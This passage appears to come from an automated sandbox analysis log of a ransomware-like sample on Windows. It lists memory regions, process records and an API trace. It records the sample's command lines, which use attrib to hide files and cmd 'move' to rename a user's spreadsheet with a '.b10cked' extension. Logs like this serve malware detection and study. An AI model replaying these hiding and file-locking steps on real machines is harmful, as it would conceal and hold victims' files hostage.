"private_0x000000007ffdf000" filename = "" Region: id = 12329 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12330 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12331 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12332 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 12333 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 12334 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12335 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12336 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12337 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12338 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12339 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12340 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12341 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12342 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12343 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12344 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12345 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12346 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 12347 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12348 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 169 os_tid = 0xaf4 Process: id = "113" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "111" os_parent_pid = "0xaa4" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12414 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12415 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12416 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12417 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 12418 start_va = 0x7e0000 end_va = 0x7e6fff entry_point = 0x7e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12419 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12420 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12421 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12422 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12423 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12424 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12425 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12426 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12427 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 12428 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 12429 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12430 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12431 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12432 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12433 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12434 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12435 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12436 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12437 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12438 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12439 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12440 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12441 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 12442 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12443 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 170 os_tid = 0xb80 Process: id = "114" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "111" os_parent_pid = "0xaa4" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12444 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12445 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12446 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12447 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12448 start_va = 0x650000 end_va = 0x656fff entry_point = 0x650000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12449 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12450 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12451 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12452 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 12453 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12454 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12455 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12456 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12457 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12458 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 12459 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12460 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12461 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12462 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12463 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12464 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12465 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12466 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12467 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12468 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12469 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12470 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12471 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 12472 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12473 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 171 os_tid = 0xae8 Process: id = "115" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12486 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12487 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12488 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12489 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12490 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12491 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12492 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12493 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12494 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12495 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12516 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12517 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12518 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12519 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12520 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 12521 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12522 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12523 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12524 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12525 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12526 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12527 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12528 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12529 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12530 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 12531 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12532 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12533 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12534 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 12535 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 12536 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12537 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 12538 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 12539 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 172 os_tid = 0xb5c [0132.567] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa64 | out: lpSystemTimeAsFileTime=0x2efa64*(dwLowDateTime=0x88f39b00, dwHighDateTime=0x1d440a9)) [0132.567] GetCurrentProcessId () returned 0xba0 [0132.567] GetCurrentThreadId () returned 0xb5c [0132.567] GetTickCount () returned 0x2a2c3 [0132.567] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa5c | out: lpPerformanceCount=0x2efa5c*=18935670475) returned 1 [0132.568] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0132.568] __set_app_type (_Type=0x1) [0132.568] __p__fmode () returned 0x76b331f4 [0132.568] __p__commode () returned 0x76b331fc [0132.568] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0132.568] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0132.568] GetCurrentThreadId () returned 0xb5c [0132.569] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb5c) returned 0x38 [0132.569] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.569] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0132.569] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.569] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.569] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef9f4 | out: phkResult=0x2ef9f4*=0x0) returned 0x2 [0132.569] VirtualQuery (in: lpAddress=0x2efa2b, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.569] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.569] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.569] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.569] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.569] GetConsoleOutputCP () returned 0x1b5 [0132.569] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.569] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0132.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.569] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.569] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.570] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.570] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.570] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.570] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.570] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.570] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.570] GetEnvironmentStringsW () returned 0x3d0198* [0132.570] FreeEnvironmentStringsW (penv=0x3d0198) returned 1 [0132.570] GetEnvironmentStringsW () returned 0x3d0198* [0132.570] FreeEnvironmentStringsW (penv=0x3d0198) returned 1 [0132.570] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee964 | out: phkResult=0x2ee964*=0x40) returned 0x0 [0132.570] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: 